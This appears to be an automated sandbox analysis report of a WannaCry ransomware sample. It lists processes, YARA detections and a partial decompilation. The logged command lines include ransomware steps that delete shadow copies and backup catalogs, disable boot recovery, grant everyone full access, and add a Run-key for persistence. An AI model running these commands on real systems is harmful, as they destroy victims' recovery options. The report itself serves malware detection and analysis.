                                                    • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000004.00000003.2985145893.000001846EFA7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000004.00000003.2985145893.000001846EFA7000.00000004.00000020.00020000.00000000.sdmp, Author: us-cert code analysis team
                                                    • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000004.00000002.2989666418.000001846CCE0000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                    Reputation:moderate

                                                    General

                                                    Target ID:5
                                                    Start time:09:28:59
                                                    Start date:15/05/2023
                                                    Path:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                    Wow64 process (32bit):true
                                                    Commandline:WannaCrypt0r.sk
                                                    Imagebase:0x400000
                                                    File size:3514368 bytes
                                                    MD5 hash:84C82835A5D21BBCF75A61706D8AB549
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000005.00000003.4342275921.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000005.00000000.2990977439.000000000040E000.00000008.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
                                                    • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000005.00000003.3016294775.0000000000870000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000005.00000003.3030888426.0000000000876000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000005.00000003.3370890950.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000005.00000003.3037184208.000000000087B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: WannaCry_Ransomware, Description: Detects WannaCry Ransomware, Source: C:\Users\user\Desktop\WannaCrypt0r.sk, Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
                                                    • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\Users\user\Desktop\WannaCrypt0r.sk, Author: Joe Security
                                                    • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Users\user\Desktop\WannaCrypt0r.sk, Author: ReversingLabs
                                                    • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: C:\Users\user\Desktop\WannaCrypt0r.sk, Author: us-cert code analysis team
                                                    Antivirus matches:
                                                    • Detection: 94%, ReversingLabs
                                                    Reputation:moderate

                                                    General

                                                    Target ID:6
                                                    Start time:09:29:00
                                                    Start date:15/05/2023
                                                    Path:C:\Windows\SysWOW64\attrib.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:attrib +h .
                                                    Imagebase:0xab0000
                                                    File size:19456 bytes
                                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate

                                                    General

                                                    Target ID:7
                                                    Start time:09:29:00
                                                    Start date:15/05/2023
                                                    Path:C:\Windows\SysWOW64\icacls.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:icacls . /grant Everyone:F /T /C /Q
                                                    Imagebase:0x770000
                                                    File size:29696 bytes
                                                    MD5 hash:2E49585E4E08565F52090B144062F97E
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language

                                                    General

                                                    Target ID:8
                                                    Start time:09:29:00
                                                    Start date:15/05/2023
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0xb90000
                                                    File size:875008 bytes
                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language

                                                    General

                                                    Target ID:9
                                                    Start time:09:29:00
                                                    Start date:15/05/2023
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff67b000000
                                                    File size:875008 bytes
                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language

                                                    General

                                                    Target ID:10
                                                    Start time:09:29:01
                                                    Start date:15/05/2023
                                                    Path:C:\Users\user\Desktop\taskdl.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:taskdl.exe
                                                    Imagebase:0x400000
                                                    File size:20480 bytes
                                                    MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Antivirus matches:
                                                    • Detection: 89%, ReversingLabs

                                                    General

                                                    Target ID:11
                                                    Start time:09:29:01
                                                    Start date:15/05/2023
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\system32\cmd.exe /c 198851684139341.bat
                                                    Imagebase:0xc0000
                                                    File size:236544 bytes
                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language

                                                    General

                                                    Target ID:12
                                                    Start time:09:29:01
                                                    Start date:15/05/2023
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff67b000000
                                                    File size:875008 bytes
                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language

                                                    General

                                                    Target ID:13
                                                    Start time:09:29:02
                                                    Start date:15/05/2023
                                                    Path:C:\Windows\SysWOW64\cscript.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:cscript.exe //nologo m.vbs
                                                    Imagebase:0xe50000
                                                    File size:144896 bytes
                                                    MD5 hash:13783FF4A2B614D7FBD58F5EEBDEDEF6
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language

                                                    General

                                                    Target ID:15
                                                    Start time:09:29:31
                                                    Start date:15/05/2023
                                                    Path:C:\Users\user\Desktop\taskdl.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:taskdl.exe
                                                    Imagebase:0x400000
                                                    File size:20480 bytes
                                                    MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language

                                                    General

                                                    Target ID:18
                                                    Start time:09:30:02
                                                    Start date:15/05/2023
                                                    Path:C:\Users\user\Desktop\taskdl.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:taskdl.exe
                                                    Imagebase:0x400000
                                                    File size:20480 bytes
                                                    MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language

                                                    General

                                                    Target ID:21
                                                    Start time:09:30:32
                                                    Start date:15/05/2023
                                                    Path:C:\Users\user\Desktop\taskdl.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:taskdl.exe
                                                    Imagebase:0x400000
                                                    File size:20480 bytes
                                                    MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language

                                                    General

                                                    Target ID:23
                                                    Start time:09:31:02
                                                    Start date:15/05/2023
                                                    Path:C:\Users\user\Desktop\taskdl.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:taskdl.exe
                                                    Imagebase:0x400000
                                                    File size:20480 bytes
                                                    MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language

                                                    General

                                                    Target ID:25
                                                    Start time:09:31:14
                                                    Start date:15/05/2023
                                                    Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:@WanaDecryptor@.exe co
                                                    Imagebase:0x400000
                                                    File size:245760 bytes
                                                    MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000019.00000000.4343624168.000000000041F000.00000008.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                    Antivirus matches:
                                                    • Detection: 96%, ReversingLabs

                                                    General

                                                    Target ID:26
                                                    Start time:09:31:14
                                                    Start date:15/05/2023
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:cmd.exe /c start /b @WanaDecryptor@.exe vs
                                                    Imagebase:0xc0000
                                                    File size:236544 bytes
                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language

                                                    General

                                                    Target ID:27
                                                    Start time:09:31:14
                                                    Start date:15/05/2023
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff67b000000
                                                    File size:875008 bytes
                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language

                                                    General

                                                    Target ID:28
                                                    Start time:09:31:14
                                                    Start date:15/05/2023
                                                    Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:@WanaDecryptor@.exe vs
                                                    Imagebase:0x400000
                                                    File size:245760 bytes
                                                    MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 0000001C.00000000.4347439754.000000000041F000.00000008.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp, Author: Joe Security

                                                    General

                                                    Target ID:29
                                                    Start time:09:31:16
                                                    Start date:15/05/2023
                                                    Path:C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:TaskData\Tor\taskhsvc.exe
                                                    Imagebase:0x5d0000
                                                    File size:3098624 bytes
                                                    MD5 hash:FE7EB54691AD6E6AF77F8A9A0B6DE26D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Antivirus matches:
                                                    • Detection: 0%, ReversingLabs

                                                    General

                                                    Target ID:30
                                                    Start time:09:31:17
                                                    Start date:15/05/2023
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff67b000000
                                                    File size:875008 bytes
                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language

                                                    General

                                                    Target ID:31
                                                    Start time:09:31:25
                                                    Start date:15/05/2023
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                                                    Imagebase:0xc0000
                                                    File size:236544 bytes
                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language

                                                    General

                                                    Target ID:32
                                                    Start time:09:31:25
                                                    Start date:15/05/2023
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff67b000000
                                                    File size:875008 bytes
                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language

                                                    General

                                                    Target ID:33
                                                    Start time:09:31:25
                                                    Start date:15/05/2023
                                                    Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:wmic shadowcopy delete
                                                    Imagebase:0x970000
                                                    File size:393216 bytes
                                                    MD5 hash:82BB8430531876FBF5266E53460A393E
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language

                                                    General

                                                    Target ID:34
                                                    Start time:09:31:25
                                                    Start date:15/05/2023
                                                    Path:C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
                                                    Imagebase:0xa0000
                                                    File size:418304 bytes
                                                    MD5 hash:64ACA4F48771A5BA50CD50F2410632AD
                                                    Has elevated privileges:true
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language

                                                    General

                                                    Target ID:36
                                                    Start time:09:31:31
                                                    Start date:15/05/2023
                                                    Path:C:\Users\user\Desktop\taskse.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:taskse.exe C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                    Imagebase:0x400000
                                                    File size:20480 bytes
                                                    MD5 hash:8495400F199AC77853C53B5A3F278F3E
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Antivirus matches:
                                                    • Detection: 89%, ReversingLabs

                                                    General

                                                    Target ID:37
                                                    Start time:09:31:31
                                                    Start date:15/05/2023
                                                    Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:@WanaDecryptor@.exe
                                                    Imagebase:0x400000
                                                    File size:245760 bytes
                                                    MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000025.00000000.4517258292.000000000041F000.00000008.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp, Author: Joe Security

                                                    General

                                                    Target ID:38
                                                    Start time:09:31:31
                                                    Start date:15/05/2023
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "vfwrglgamdagtoq456" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f
                                                    Imagebase:0xc0000
                                                    File size:236544 bytes
                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language

                                                    General

                                                    Target ID:39
                                                    Start time:09:31:32
                                                    Start date:15/05/2023
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff67b000000
                                                    File size:875008 bytes
                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language

                                                    General

                                                    Target ID:40
                                                    Start time:09:31:32
                                                    Start date:15/05/2023
                                                    Path:C:\Windows\SysWOW64\reg.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "vfwrglgamdagtoq456" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f
                                                    Imagebase:0xec0000
                                                    File size:59392 bytes
                                                    MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language

                                                    General

                                                    Target ID:41
                                                    Start time:09:31:32
                                                    Start date:15/05/2023
                                                    Path:C:\Users\user\Desktop\taskdl.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:taskdl.exe
                                                    Imagebase:0x400000
                                                    File size:20480 bytes
                                                    MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language

                                                    General

                                                    Target ID:42
                                                    Start time:09:32:02
                                                    Start date:15/05/2023
                                                    Path:C:\Users\user\Desktop\taskse.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:taskse.exe C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                    Imagebase:0x400000
                                                    File size:20480 bytes
                                                    MD5 hash:8495400F199AC77853C53B5A3F278F3E
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language

                                                    General

                                                    Target ID:43
                                                    Start time:09:32:02
                                                    Start date:15/05/2023
                                                    Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:@WanaDecryptor@.exe
                                                    Imagebase:0x400000
                                                    File size:245760 bytes
                                                    MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 0000002B.00000000.4824076441.000000000041F000.00000008.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 0000002B.00000002.4826014991.000000000041F000.00000008.00000001.01000000.00000009.sdmp, Author: Joe Security

                                                    General

                                                    Target ID:44
                                                    Start time:09:32:03
                                                    Start date:15/05/2023
                                                    Path:C:\Users\user\Desktop\taskdl.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:taskdl.exe
                                                    Imagebase:0x400000
                                                    File size:20480 bytes
                                                    MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language

                                                    General

                                                    Target ID:45
                                                    Start time:09:32:32
                                                    Start date:15/05/2023
                                                    Path:C:\Users\user\Desktop\taskse.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:taskse.exe C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                    Imagebase:0x400000
                                                    File size:20480 bytes
                                                    MD5 hash:8495400F199AC77853C53B5A3F278F3E
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language

                                                    General

                                                    Target ID:46
                                                    Start time:09:32:32
                                                    Start date:15/05/2023
                                                    Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:@WanaDecryptor@.exe
                                                    Imagebase:0x400000
                                                    File size:245760 bytes
                                                    MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 0000002E.00000002.5128621627.000000000041F000.00000008.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 0000002E.00000000.5126549590.000000000041F000.00000008.00000001.01000000.00000009.sdmp, Author: Joe Security

                                                    General

                                                    Target ID:47
                                                    Start time:09:32:33
                                                    Start date:15/05/2023
                                                    Path:C:\Users\user\Desktop\taskdl.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:taskdl.exe
                                                    Imagebase:0x400000
                                                    File size:20480 bytes
                                                    MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language

                                                    General

                                                    Target ID:48
                                                    Start time:09:33:02
                                                    Start date:15/05/2023
                                                    Path:C:\Users\user\Desktop\taskse.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:taskse.exe C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                    Imagebase:0x400000
                                                    File size:20480 bytes
                                                    MD5 hash:8495400F199AC77853C53B5A3F278F3E
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language

                                                    General

                                                    Target ID:49
                                                    Start time:09:33:02
                                                    Start date:15/05/2023
                                                    Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:@WanaDecryptor@.exe
                                                    Imagebase:0x400000
                                                    File size:245760 bytes
                                                    MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000031.00000000.5428511190.000000000041F000.00000008.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000031.00000002.5430205338.000000000041F000.00000008.00000001.01000000.00000009.sdmp, Author: Joe Security

                                                    General

                                                    Target ID:50
                                                    Start time:09:33:03
                                                    Start date:15/05/2023
                                                    Path:C:\Users\user\Desktop\taskdl.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:taskdl.exe
                                                    Imagebase:0x400000
                                                    File size:20480 bytes
                                                    MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language

                                                    General

                                                    Target ID:51
                                                    Start time:09:33:33
                                                    Start date:15/05/2023
                                                    Path:C:\Users\user\Desktop\taskse.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:taskse.exe C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                    Imagebase:0x400000
                                                    File size:20480 bytes
                                                    MD5 hash:8495400F199AC77853C53B5A3F278F3E
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language

                                                    General

                                                    Target ID:52
                                                    Start time:09:33:33
                                                    Start date:15/05/2023
                                                    Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:@WanaDecryptor@.exe
                                                    Imagebase:0x400000
                                                    File size:245760 bytes
                                                    MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000034.00000002.5732242026.000000000041F000.00000008.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000034.00000000.5730513383.000000000041F000.00000008.00000001.01000000.00000009.sdmp, Author: Joe Security

                                                    Disassembly

                                                    Reset < >

                                                      Execution Graph

                                                      Execution Coverage:24.8%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:20.2%
                                                      Total number of Nodes:94
                                                      Total number of Limit Nodes:1
                                                      execution_graph 315 401360 316 4013a7 315->316 320 401372 315->320 322 4018d0 free 316->322 318 4013b0 320->316 321 4018d0 free 320->321 321->320 322->318 212 4018f6 __set_app_type __p__fmode __p__commode 213 401965 212->213 214 401979 213->214 215 40196d __setusermatherr 213->215 224 401a66 _controlfp 214->224 215->214 217 40197e _initterm __getmainargs _initterm 218 4019d2 GetStartupInfoA 217->218 220 401a06 GetModuleHandleA 218->220 225 4012c0 GetLogicalDrives 220->225 224->217 226 4012e0 225->226 227 401305 GetDriveTypeW 226->227 228 401324 exit _XcptFilter 226->228 231 401080 226->231 227->226 255 401000 GetWindowsDirectoryW 231->255 233 4010d5 swprintf FindFirstFileW 234 40114a 233->234 241 401114 233->241 235 40114e swprintf ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N wcslen ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N 234->235 237 40119e 235->237 242 4011ae ?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI 237->242 268 4013d0 237->268 239 401140 Sleep 239->226 244 401136 241->244 261 401870 241->261 242->237 243 4011d9 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N FindNextFileW 243->235 245 401204 FindClose 243->245 267 4018d0 free 244->267 251 401215 245->251 246 40124a 247 401254 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N 246->247 248 401265 246->248 247->247 247->248 249 40128f 248->249 250 40127e ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N 248->250 297 4018d0 free 249->297 250->249 250->250 251->246 252 401239 DeleteFileW 251->252 252->251 254 401299 254->239 256 401022 GetTempPathW wcslen 255->256 257 40105e swprintf 255->257 258 401073 256->258 259 40103e wcslen 256->259 257->258 258->233 259->258 260 40104c wcslen 259->260 260->233 262 401885 261->262 263 40187a 261->263 264 4018bb 262->264 299 4018d0 free 262->299 263->262 298 4018d0 free 263->298 264->241 267->239 269 40152b 268->269 273 4013f2 ??2@YAPAXI 268->273 282 4015e7 269->282 283 40153e 269->283 270 401677 270->243 271 401574 274 40159e 271->274 280 401690 7 API calls 271->280 272 401616 278 401629 ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@II 272->278 279 401647 272->279 285 401440 273->285 286 401458 273->286 274->270 275 4015b3 ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@II 274->275 275->275 281 4015cd 275->281 276 401690 7 API calls 276->282 277 401690 7 API calls 277->283 278->278 278->279 279->270 287 40165c ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@II 279->287 280->271 281->243 282->270 282->272 282->276 283->271 283->277 285->286 300 401690 285->300 290 401690 7 API calls 286->290 295 40147e 286->295 287->270 287->287 289 4014b5 291 4014d0 289->291 292 4014bf ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N 289->292 290->286 314 4018d0 free 291->314 292->291 292->292 294 401690 7 API calls 294->295 295->289 295->294 296 4014d9 296->243 297->254 298->262 299->264 301 4016c0 300->301 307 4017c4 300->307 302 4016e8 301->302 306 40175b 301->306 303 4016f4 ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 302->303 304 4016ee ?_Xran@std@ 302->304 309 401705 303->309 304->303 305 4017b5 ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N 305->307 306->305 310 401775 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N 306->310 307->285 308 401740 ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 308->285 309->308 312 401721 ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N 309->312 311 401786 310->311 311->285 312->308 313 401737 ?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI 312->313 313->308 314->296 323 401a48 _exit 324 401a9b ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE

                                                      Callgraph

                                                      Executed Functions

                                                      Function 00401080 Relevance: 19.7, APIs: 13, Instructions: 173fileCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      C-Code - Quality: 55%
                                                      			E00401080(intOrPtr _a4) {
				void* _v4;
				char _v16;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v40;
				char _v560;
				struct _WIN32_FIND_DATAW _v632;
				long _v1124;
				long _v1644;
				long _v1648;
				char _v1656;
